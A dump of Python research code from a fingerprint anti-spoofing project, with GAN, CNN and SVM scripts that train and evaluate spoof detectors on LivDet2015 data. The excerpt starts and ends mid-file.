l_s2)**2)\n return loss\n\n\ndef signer_transfer_loss(h_conv_split, signers_on_batch):\n \"\"\"Computes signer-transfer loss\"\"\"\n # generate pairwise signer combo list\n signers_combo_list = list(itertools.combinations(signers_on_batch, 2))\n\n # pairwise loss for conv and dense layers\n conv_loss = pairwise_loss(signers_combo_list, h_conv_split)\n #dense_loss = pairwise_loss(signers_combo_list, h_dense_split)\n\n loss = (conv_loss) * 1/len(signers_combo_list)\n\n return loss\n\n\ndef softCrossEntropyUniform(outputs):\n \n \n \"\"\"\n Args:\n outputs: output of the last layer before softmax, tensor of size (N, C)\n\n Outputs:\n loss: empirical cross-entropy between the uniform distribution and outputs,\n tensor of size (1,)\n \"\"\"\n\n return -log_softmax(outputs, dim=1).mean()\n" }, { "alpha_fraction": 0.5684884786605835, "alphanum_fraction": 0.5827365517616272, "avg_line_length": 34.074073791503906, "blob_id": "bd5d77a87c8970c25d44eb6d656223b614d436a9", "content_id": "f50c6d65db935833d72d419854bfc30f4d8d18ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13265, "license_type": "no_license", "max_line_length": 199, "num_lines": 378, "path": "/II-GAN/run.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\nimport cv2\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\n\nfrom utils import _nanargmin, normal_weights_init\nfrom evaluation import eval_model, test_model\nfrom data import get_data_loaders\nfrom gan import DISCRIMINATOR, GENERATOR\nfrom matcher import MATCHER\n\nBATCH_SIZE = 32\n\nIMG_SIZE = 128\n\nloss = nn.BCEWithLogitsLoss()\n\nsigmoid = nn.Sigmoid()\n\nLEARNING_RATE = 2e-4\n\n#-------------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\n# Training LooP\n\ndef fit(models, dataset, fake_material, data, num_epochs, matcher_epochs, device, with_generator = True, just_train_classifier = False):\n\n matcher_epochs = matcher_epochs + 1\n\n train_loader, valid_loader = data\n netD, netG = models \n\n if just_train_classifier == True:\n path = \"/ctm-hdd-pool01/afpstudents/jaf/LIVEGEN_\" + dataset + \"_material\" + str(fake_material) + \"_\" + str(500) + \"epochs_\"\n netG.load_state_dict(torch.load(path + 'Generator.pth'))\n\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/LIVEGEN_\" + dataset + \"_material\" + str(fake_material) + \"_\" + str(num_epochs) + \"epochs_\"\n output_path = f\"results/{DATASET}/{DATASET}_{TOA}_material{PAI}_{EPOCHS}epochs_\"\n\n # Start training\n train_history = {'train_c_loss': [], 'train_g_loss': [], 'train_acc': [], 'val_c_loss': [], 'val_g_loss': [], 'val_acc': []}\n \n netD.apply(normal_weights_init)\n\n if just_train_classifier == False:\n netG.apply(normal_weights_init)\n \n optimizerD = optim.Adam(netD.parameters(), lr=LEARNING_RATE)\n optimizerG = optim.Adam(netG.parameters(), lr=LEARNING_RATE)\n \n netD.train()\n netG.train()\n\n score_matcher = 0\n n_batches = 0\n \n for epoch in range(num_epochs):\n \n print(\"\\n\")\n \n g_loss = []\n d_loss = []\n\n d_real = []\n d_fake = []\n \n for i, (x,y) in enumerate(train_loader, 0):\n \n # (1) Update D network\n \n ## Train with all-real batch\n \n netD.zero_grad()\n netG.zero_grad()\n \n x = x.to(device)\n x_real = x[y == 0]\n x_fake = x[y == 1]\n\n \n\n if x_fake.shape[0] < 5:\n continue\n \n #b_size = real.size(0)\n \n output_real = netD(x_real)\n D_x = sigmoid(output_real.mean()).item()\n \n real_label = torch.zeros_like(output_real, device=device)\n \n errD_real = loss(output_real, real_label)\n\n ## Train with all-fake batch\n\n if with_generator:\n \n index = [i for i in range(x_fake.shape[0])]\n\n index_to_modify = random.sample(range(x_fake.shape[0]), x_fake.shape[0]//2)\n\n index_to_maintain = [i for i in index if i not in index_to_modify]\n\n x_fake_to_modify = x_fake[index_to_modify,...].clone().detach()\n\n x_fake_to_maintain = x_fake[index_to_maintain,...].clone().detach()\n\n x_fake_modified = netG(x_fake_to_modify)\n\n x_fake = torch.cat([x_fake_to_maintain, x_fake_modified], dim=0)\n\n if epoch >= num_epochs - matcher_epochs and just_train_classifier == False:\n\n try:\n m_score = MATCHER(x_fake_to_modify, x_fake_modified)\n except:\n m_score = 10.0\n\n if epoch == num_epochs-1:\n try:\n score_matcher = score_matcher + MATCHER(x_fake_to_modify, x_fake_modified)\n except:\n score_matcher = score_matcher + 10.0\n\n n_batches = n_batches + 1\n\n output_fake = netD(x_fake.detach())\n\n D_G_z = sigmoid(output_fake.mean()).item()\n \n fake_label = torch.ones_like(output_fake, device=device)\n \n errD_fake = loss(output_fake, fake_label)\n\n errD = errD_real + errD_fake\n\n errD.backward()\n optimizerD.step()\n \n # (2) Update G network\n\n if with_generator:\n \n netD.zero_grad()\n netG.zero_grad()\n \n output_fake = netD(x_fake)\n real_label = torch.zeros_like(output_fake, device=device)\n errG = loss(output_fake, real_label)\n\n if epoch >= num_epochs - matcher_epochs and just_train_classifier == False:\n errG = errG + m_score\n\n if just_train_classifier == False:\n errG.backward()\n optimizerG.step()\n \n #######################################################################\n #######################################################################\n \n sys.stdout.write(\"\\r\" + 'EPOCH [{}/{}] ..... {}-th batch: D_real = {:.3f} | D_fake = {:.3f}'.format(epoch+1, num_epochs, i+1, D_x, D_G_z))\n \n #Progress with fixed noise\n if with_generator and just_train_classifier == False:\n with torch.no_grad(): \n x_fake_modified = netG(x_fake_to_modify)\n save_images(x_fake_to_modify[:3], x_fake_modified[:3], dataset, fake_material, epoch)\n \n tr_c_loss, tr_g_loss, tr_acc = eval_model((netD, netG), train_loader, device, epoch, num_epochs, matcher_epochs, with_generator = with_generator)\n train_history['train_c_loss'].append(tr_c_loss.item())\n train_history['train_g_loss'].append(tr_g_loss.item())\n train_history['train_acc'].append(tr_acc)\n\n val_c_loss, val_g_loss, val_acc = eval_model((netD, netG), valid_loader, device, epoch, num_epochs, matcher_epochs, with_generator = with_generator)\n train_history['val_c_loss'].append(val_c_loss.item())\n train_history['val_g_loss'].append(val_g_loss.item())\n train_history['val_acc'].append(val_acc)\n\n # display the training loss\n print()\n print( '\\n>> Train: C_loss = {:.3f} |'.format(tr_c_loss.item()) + ' G_loss = {:.3f} |'.format(tr_g_loss.item()) + ' Acc = {:.3f}'.format(tr_acc) )\n print( '\\n>> Valid: C_loss = {:.3f} |'.format(val_c_loss.item()) + ' G_loss = {:.3f} |'.format(val_g_loss.item()) + ' Acc = {:.3f}'.format(val_acc) )\n print()\n\n if epoch == num_epochs-1 and with_generator and just_train_classifier == False:\n score_matcher = score_matcher / n_batches\n print('\\n>> Average matching score = {:.3f}'.format(score_matcher))\n\n # save train/valid history\n plot_fn = output_path + 'LIVEGEN_history.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n #load last model\n torch.save(netD.state_dict(), model_path + 'Discriminator.pth')\n if just_train_classifier == False:\n torch.save(netG.state_dict(), model_path + 'Generator.pth')\n \n return (netD, train_history)\n\n\ndef save_images(original_images, modified_images, dataset, fake_material, epoch):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.suptitle(\"Epoch {}\".format(epoch+1))\n ax1.axis(\"off\")\n ax2.axis(\"off\")\n ax1.imshow(np.transpose(vutils.make_grid(original_images, padding=2, normalize=True, nrow= 1).cpu(), (1,2,0)), vmin=-1, vmax=1)\n ax1.set_title(\"Original\")\n ax2.imshow(np.transpose(vutils.make_grid(modified_images, padding=2, normalize=True, nrow= 1).cpu(), (1,2,0)), vmin=-1, vmax=1)\n ax2.set_title(\"Modified\")\n fig.savefig('results/' + dataset + '/images_' + str(fake_material) + '/' + 'epoch_' + str(epoch+1) + '.png')\n\n\ndef plot_train_history(train_history, plot_fn):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_c_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_c_loss = train_history['val_c_loss'][best_val_epoch]\n best_val_g_loss = train_history['val_g_loss'][best_val_epoch]\n \n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_c_loss'])\n x = range(epochs)\n\n plt.subplot(311)\n plt.plot(x, train_history['train_c_loss'], 'r-')\n plt.plot(x, train_history['val_c_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_c_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val classifier loss')\n plt.legend(['train_clf_loss', 'val_clf_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_c_loss'])])\n\n plt.subplot(312)\n plt.plot(x, train_history['train_g_loss'], 'r-')\n plt.plot(x, train_history['val_g_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_g_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val generator loss')\n plt.legend(['train_gen_loss', 'val_gen_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_g_loss'])])\n\n plt.subplot(313)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n\n plt.savefig(plot_fn)\n plt.close() \n \nIMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n#IMG_PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n#IMG_PATH = \"/content/drive/My Drive/FPAD/Dataset/LivDet2015/train/\"\n\nEPOCHS = 250\nBATCH_SIZE = 32\nIMG_SIZE = 224\n\nprint()\nif torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"[Device] - GPU\")\nelse:\n DEVICE = torch.device(\"cpu\")\n print(\"[Device] - CPU\")\nprint()\n\n#DATASET = input(\"Dataset [CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n#DATASET = \"Digital_Persona\"\n\nUNSEEN_ATTACK = True\nUSE_GENERATOR = True\nEPOCHS_WITH_MATCHER = 125\n\nif USE_GENERATOR:\n TG = \"wGen\"\nelse:\n TG = \"noGen\"\n\nif UNSEEN_ATTACK:\n TOA = \"UA\"\nelse:\n TOA = \"OA\"\n\n# [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"]\n\nfor DATASET in [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"]:\n\n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n TEST_MATERIALS = [0, 1, 2]\n else:\n NUM_MATERIALS = 4\n TEST_MATERIALS = [0, 1, 2, 3]\n\n results = []\n\n for PAI in TEST_MATERIALS:\n\n netD = DISCRIMINATOR().to(DEVICE)\n netG = GENERATOR().to(DEVICE)\n\n print(\"[Dataset] - \" + DATASET + \" -> Material number \" + str(PAI))\n \n train_loader, valid_loader, test_loader = get_data_loaders(IMG_PATH, DATASET, test_material = PAI, img_size = IMG_SIZE, batch_size = BATCH_SIZE, croped=True, unseen_attack=UNSEEN_ATTACK)\n\n #netD, train_history = fit((netD, netG), DATASET, PAI, (train_loader, valid_loader), EPOCHS, EPOCHS_WITH_MATCHER, DEVICE, with_generator = USE_GENERATOR)\n\n netD, train_history = fit((netD, netG), DATASET, PAI, (train_loader, valid_loader), EPOCHS, EPOCHS_WITH_MATCHER, DEVICE, with_generator = USE_GENERATOR, just_train_classifier = True)\n\n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = test_model(netD, test_loader, DEVICE)\n\n results.append((test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n\n #PRINTS -------------------------------------------------------------------------------------\n\n # Compute average and std\n acc_array = np.array([i[1] for i in results])\n apcer_array = np.array([i[2] for i in results])\n bpcer_array = np.array([i[3] for i in results])\n eer_array = np.array([i[4] for i in results])\n bpcer_apcer1_array = np.array([i[5] for i in results])\n bpcer_apcer5_array = np.array([i[6] for i in results])\n bpcer_apcer10_array = np.array([i[7] for i in results])\n apcer1_array = np.array([i[8] for i in results])\n apcer5_array = np.array([i[9] for i in results])\n apcer10_array = np.array([i[10] for i in results])\n\n print()\n print(\">> TEST RESULTS [Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]:\")\n print()\n\n results_test = []\n\n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n\n np.savetxt(DATASET + '_' + TOA + '_' + TG + '_' + str(EPOCHS) + 'epochs_test.txt', results_test, fmt='%.3f', delimiter=',') " }, { "alpha_fraction": 0.47323521971702576, "alphanum_fraction": 0.4890168607234955, "avg_line_length": 26.421052932739258, "blob_id": "4520f4a2837d8517adcefd7707e58e9993118104", "content_id": "f1cf6ed49bd413ec6676db688e18cddba056191e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4689, "license_type": "no_license", "max_line_length": 71, "num_lines": 171, "path": "/CNNreg/models/cnn2.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom cnn2_layers import BasicConvLayer, BasicDenseLayer\n\n\nN_CLASSES = 2 \nCHANNELS = 1 \n\nCONV_FILTERS = [64, 64, 128, 128, 256, 256, 256, 256]\n\nN_CONV = len(CONV_FILTERS)\n\n\nMAX_POOL = [False, True, False, True, False, False, False, True]\n\nK_SIZES = [3]*N_CONV\n\nSTRIDES = [1]*N_CONV\n\nPADDINGS = [1]*N_CONV\n\nFC_DIMS = [4096, 4096, 1000, 2]\n\nDROPOUT = .5\nBATCH_NORM = True\n\nN_CONV = len(CONV_FILTERS)\nN_FC = len(FC_DIMS)\n\nclass CNN2_FPAD(nn.Module):\n def __init__(self,\n activation='relu',\n bnorm=False,\n dropout=0.0,\n is_only_classifier=False):\n\n super(CNN2_FPAD, self).__init__()\n\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n\n self.is_only_classifier = is_only_classifier\n\n if self.is_only_classifier:\n # Initialize fc layers\n self.create_dense_layers()\n else:\n # Initialize conv layers\n self.create_conv_layers()\n \n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n \n # Initialize fc layers\n self.create_dense_layers()\n\n\n def create_conv_layers(self):\n # first conv layer\n conv_list = nn.ModuleList([\n BasicConvLayer(in_channels=CHANNELS,\n out_channels=CONV_FILTERS[0],\n kernel_size=K_SIZES[0],\n stride=STRIDES[0],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[0])\n ])\n\n # remaining conv layers\n conv_list.extend([BasicConvLayer(in_channels=CONV_FILTERS[l-1],\n out_channels=CONV_FILTERS[l],\n kernel_size=K_SIZES[l],\n stride=STRIDES[l],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[l])\n for l in range(1, N_CONV)])\n\n\n self.convolutions = nn.Sequential(*conv_list)\n\n def create_dense_layers(self):\n \n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=CONV_FILTERS[-1] * 7 * 7,\n out_features=FC_DIMS[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=FC_DIMS[l-1],\n out_features=FC_DIMS[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, N_FC-1)])\n\n # Last dense layer\n dense_list.append(BasicDenseLayer(in_features=FC_DIMS[-2],\n out_features=FC_DIMS[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.classifier = nn.Sequential(*dense_list)\n\n def forward(self, x):\n # get the activations of each layer\n conv_list = ()\n for layer in range(N_CONV):\n x = self.convolutions[layer](x)\n conv_list += x,\n \n x = conv_list[-1]\n \n h_avgpool = self.avgpool(x)\n \n x = h_avgpool\n x = x.view(x.size(0), -1)\n \n h_list = () \n for layer in range(N_FC):\n x = self.classifier[layer](x)\n h_list += x, \n \n return (conv_list, h_avgpool, h_list)\n \n def predict(self, x):\n #probabilities of each class\n conv_list, h_avgpool, h_list = self.forward(x)\n probs = F.softmax(h_list[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n \n import os\n os.getcwd()\n os.chdir(\"../\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n\n model = CNN2_FPAD().to(DEVICE)\n\n print(model)\n" }, { "alpha_fraction": 0.4909035265445709, "alphanum_fraction": 0.5070523023605347, "avg_line_length": 36.48850631713867, "blob_id": "8abcf1ef53abaa5cde469710f186bebbdfbe9f46", "content_id": "326728bc7999c03b37aeb9af7412c5a37cdcb681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19568, "license_type": "no_license", "max_line_length": 113, "num_lines": 522, "path": "/SVM_KNN_NB/unseen_attack.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from PIL import Image\nimport glob\nfrom skimage import color\nfrom skimage.feature import local_binary_pattern\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score \nfrom sklearn.metrics import roc_curve \nfrom sklearn.metrics import roc_auc_score\nimport math\n \n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef fpad_iso_metrics(ground_truth, prediction, probs):\n \n P = np.sum(ground_truth)\n N = len(ground_truth) - np.sum(ground_truth)\n \n TP = 0\n FP = 0\n TN = 0\n FN = 0\n\n for i in range(len(prediction)): \n if ground_truth[i]==prediction[i]==1:\n TP += 1\n if prediction[i]==1 and ground_truth[i]!=prediction[i]:\n FP += 1\n if ground_truth[i]==prediction[i]==0:\n TN += 1\n if prediction[i]==0 and ground_truth[i]!=prediction[i]:\n FN += 1\n \n APCER = FN/P #FALSE NEGATIVE RATE (fnr at a defined treshold)\n BPCER = FP/N #FALSE POSITIVE RATE (fpr at a defined treshold)\n \n fpr, tpr, thresholds = roc_curve(ground_truth, probs) \n fnr = 1 - tpr\n \n BPCER25=fpr[(np.abs(fnr - 0.04)).argmin()] #closest to 4\n \n DETC = [fpr, fnr, tpr] \n \n EER = fpr[np.nanargmin(np.absolute((fnr - fpr)))]\n \n AUROC = roc_auc_score(ground_truth, probs)\n \n return(APCER, BPCER, BPCER25, DETC, EER, AUROC)\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef frange(start, stop=None, step=None):\n\n num = start\n _list = []\n while num <= stop:\n _list.append(num)\n num = num + step\n \n return _list\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef normalize(x, minimum=-1, maximum=-1):\n min_max = []\n if minimum == -1 or maximum == -1:\n from sklearn.preprocessing import normalize\n norm_x = normalize(x[:,np.newaxis], axis=0).ravel()\n min_max.append(min(norm_x))\n min_max.append(max(norm_x))\n return np.array(min_max), norm_x\n else:\n norm_x=[]\n for i in range(len(x)):\n norm_x.append((x[i]-min(x))/(max(x)-min(x)) * (maximum-minimum) + minimum)\n return np.array(norm_x)\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef unseenAttack(DATASET, croped=False):\n \n PATH = 'C:/Users/Asus/Desktop/5_Ano/5_FPAD/Dataset/'\n \n if DATASET=='CrossMatch':\n files = '/*.bmp'\n percentage = 0.33\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n elif DATASET=='Digital_Persona':\n files = '/*.png'\n percentage = 0.25\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='GreenBit':\n files = '/*.png'\n percentage = 0.25\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='Hi_Scan':\n files = '/*.bmp'\n percentage = 0.25\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n else: #Time_Series\n files = '/*.bmp'\n percentage = 0.33\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n \n if croped == False:\n print(\"\\nRunning unseen-attack on {}...\\n\".format(DATASET))\n live_path = '/Live'\n fake_path = '/Fake/'\n seg = 'Without_segmentation/'\n #txt = DATASET + '_withoutSegmentation_Int.txt'\n #txt = DATASET + '_withoutSegmentation_LBP.txt'\n txt = DATASET + '_withoutSegmentation_IntLBP.txt'\n else:\n files = '/*.png'\n print(\"\\nRunning unseen-attack with segmentation on {}...\\n\".format(DATASET))\n live_path = '/Live_c'\n fake_path = '/Fake_c/'\n seg = 'Segmentation/'\n #txt = DATASET + '_withSegmentation_Int.txt'\n #txt = DATASET + '_withSegmentation_LBP.txt'\n txt = DATASET + '_withSegmentation_IntLBP.txt'\n \n num_clf = 3 \n num_materials = (len(materials))\n \n \n radius = 1\n n_points = 8 * radius\n METHOD = 'uniform' \n \n #print(\"Processing live images...\\n\") \n \n intensity_feature = []\n LBP_feature = []\n label = []\n \n for filename in glob.glob(PATH + 'LivDet2015/train/' + DATASET + live_path + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_feature.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_feature.append(hist2.tolist())\n label.append(0)\n \n\n intensity_feature = np.array(intensity_feature)\n LBP_feature = np.array(LBP_feature)\n label = np.array(label)\n \n #X = intensity_feature\n #X = LBP_feature\n X = np.hstack((intensity_feature, LBP_feature))\n\n y = label\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=percentage, random_state=42)\n \n APCER = np.ones((num_clf, num_materials))\n BPCER = np.ones((num_clf, num_materials))\n BPCER25 = np.ones((num_clf, num_materials))\n EER = np.ones((num_clf, num_materials))\n AUROC = np.ones((num_clf, num_materials))\n \n DETC_svm = []\n DETC_nb = []\n DETC_knn = []\n\n \n # TEST/TRAIN SPOOF + CLASSIFICATION + METRICS ------------------------------------------------------------\n \n for unseen in range(0, len(materials)):\n \n print(\"\\n*UNSEEN ATTACK NUMBER {} OF {}*\\n\".format(unseen+1, len(materials)))\n #print(\"Processing spoof images...\\n\")\n \n intensity_attack = []\n LBP_attack = []\n label_attack = []\n \n for k in range(0, len(materials)): \n \n if k==unseen:\n \n material=materials[k]\n \n #print(\"\\n*ATTACK NUMBER {} OF {}*\\n\".format(attack, len(materials)))\n #print(\"Processing spoof images...\\n\")\n \n intensity_test = []\n LBP_test = []\n label_test = []\n \n for filename in glob.glob(PATH + 'LivDet2015/train/' + DATASET + fake_path + material + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_test.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_test.append(hist2.tolist())\n label_test.append(1)\n \n intensity_test = np.array(intensity_test)\n LBP_test = np.array(LBP_test)\n label_test = np.array(label_test) \n \n else:\n \n material=materials[k]\n \n #print(\"\\n*ATTACK NUMBER {} OF {}*\\n\".format(attack, len(materials)))\n #print(\"Processing spoof images...\\n\")\n \n for filename in glob.glob(PATH + 'LivDet2015/train/' + DATASET + fake_path + material + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_attack.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_attack.append(hist2.tolist())\n label_attack.append(1)\n \n \n #print(\"------------------------------\")\n #print(\"-> Concluding data preparation...\\n\")\n #################################################\n \n intensity_attack = np.array(intensity_attack)\n LBP_attack = np.array(LBP_attack)\n label_attack = np.array(label_attack) \n \n #X = intensity_attack\n #X = LBP_attack\n X = np.hstack((intensity_attack, LBP_attack))\n \n X_train = np.vstack((X_train, X))\n y = label_attack\n y_train = np.array(y_train.tolist() + y.tolist())\n \n #################################################\n intensity_test = np.array(intensity_test)\n LBP_test = np.array(LBP_test)\n label_test = np.array(label_test) \n \n #X = intensity_test\n #X = LBP_test\n X = np.hstack((intensity_test, LBP_test))\n \n X_test = np.vstack((X_test, X))\n \n y = label_test\n y_test = np.array(y_test.tolist() + y.tolist()) \n \n #print(\"-> Data normalization...\\n\")\n for i in range(X_train.shape[1]):\n min_max, X_train[:,i] = normalize(X_train[:,i])\n X_test[:,i] = normalize(X_test[:,i], min_max[0], min_max[1]) \n \n '''\n from sklearn.svm import SVC\n from sklearn.model_selection import GridSearchCV\n c_ = list(range(-2 ,2))\n c_list = []\n for c in c_:\n c_list.append(math.pow(10, c))\n d_list = [1, 2, 3, 4, 5]\n \n parameters = {'kernel':('linear', 'rbf', 'poly', 'sigmoid'), 'C':c_list, 'degree':d_list}\n svc = SVC(probability=True)\n svm = GridSearchCV(svc, parameters)\n svm.fit(X_train, y_train)\n svm.score(X_train, y_train)\n y_pred_svm = svm.predict(X_test)\n probs_svm = svm.predict_proba(X_test)\n probs_svm = probs_svm[:, 1] \n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_svm, probs_svm)\n APCER[0, unseen] = a\n BPCER[0, unseen] = b \n BPCER25[0, unseen] = c \n DETC_svm.append(d)\n EER[0, unseen] = e \n AUROC[0, unseen] = f\n '''\n \n \n # -> SVM --------------------------------------------------------------------------\n #print(\"-> SVM learning and otimization...\")\n from sklearn.svm import SVC\n kernel_list = ['linear', 'poly', 'rbf', 'sigmoid']\n c_list = list(range(-2 ,2))\n d_list = [1, 2, 3, 4, 5]\n _g = 1/(X_train.shape[1])\n otimization_svm = np.ones((len(kernel_list), len(d_list), len(c_list)))\n for _kernel in list(enumerate(kernel_list)):\n for _d in list(enumerate(d_list)):\n for _c in list(enumerate(c_list)):\n svm = SVC(C=math.pow(10, _c[1]), kernel=_kernel[1], degree=_d[1], gamma = 'auto')\n scores = cross_val_score(svm, X_train, y_train, cv=5)\n otimization_svm[_kernel[0], _d[0], _c[0]] = scores.mean()\n \n #print(\"SVM score = {}\".format(np.amax(otimization_svm)))\n result = np.where(otimization_svm == np.amax(otimization_svm))\n listOfCordinates = list(zip(result[0], result[1], result[2]))\n best_kernel = kernel_list[listOfCordinates[0][0]]\n best_d = d_list[listOfCordinates[0][1]]\n best_c = c_list[listOfCordinates[0][2]]\n \n print(\"SVM -> best kernel={}, C={} and degree={}\".format(best_kernel, best_c, best_d))\n \n svm = SVC(C=math.pow(10, best_c), kernel=best_kernel, degree=best_d, probability=True)\n svm.fit(X_train, y_train)\n \n \n y_train_svm = svm.predict(X_train)\n probs_train_svm = svm.predict_proba(X_train)\n probs_train_svm = probs_train_svm[:, 1]\n apcer, bpcer, c, d, eer, f = fpad_iso_metrics(y_train, y_train_svm, probs_train_svm)\n print(\"Train:\\nApcer={}\\nBPCER={}\\nEER={}\".format(apcer, bpcer, eer))\n \n \n y_pred_svm = svm.predict(X_test)\n probs_svm = svm.predict_proba(X_test)\n probs_svm = probs_svm[:, 1]\n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_svm, probs_svm)\n APCER[0, unseen] = a\n BPCER[0, unseen] = b \n BPCER25[0, unseen] = c \n DETC_svm.append(d)\n EER[0, unseen] = e \n AUROC[0, unseen] = f\n \n \n '''\n # -> NAIVE BAYES ------------------------------------------------------------------\n #print(\"-> Naive Bayes learning...\")\n from sklearn.naive_bayes import GaussianNB\n nb = GaussianNB()\n scores = cross_val_score(nb, X_train, y_train, cv=5)\n #print(\"NB score = {}\".format(scores.mean()))\n nb.fit(X_train, y_train)\n y_pred_nb = nb.predict(X_test)\n probs_nb = nb.predict_proba(X_test)\n probs_nb = probs_nb[:, 1] \n \n a, b, 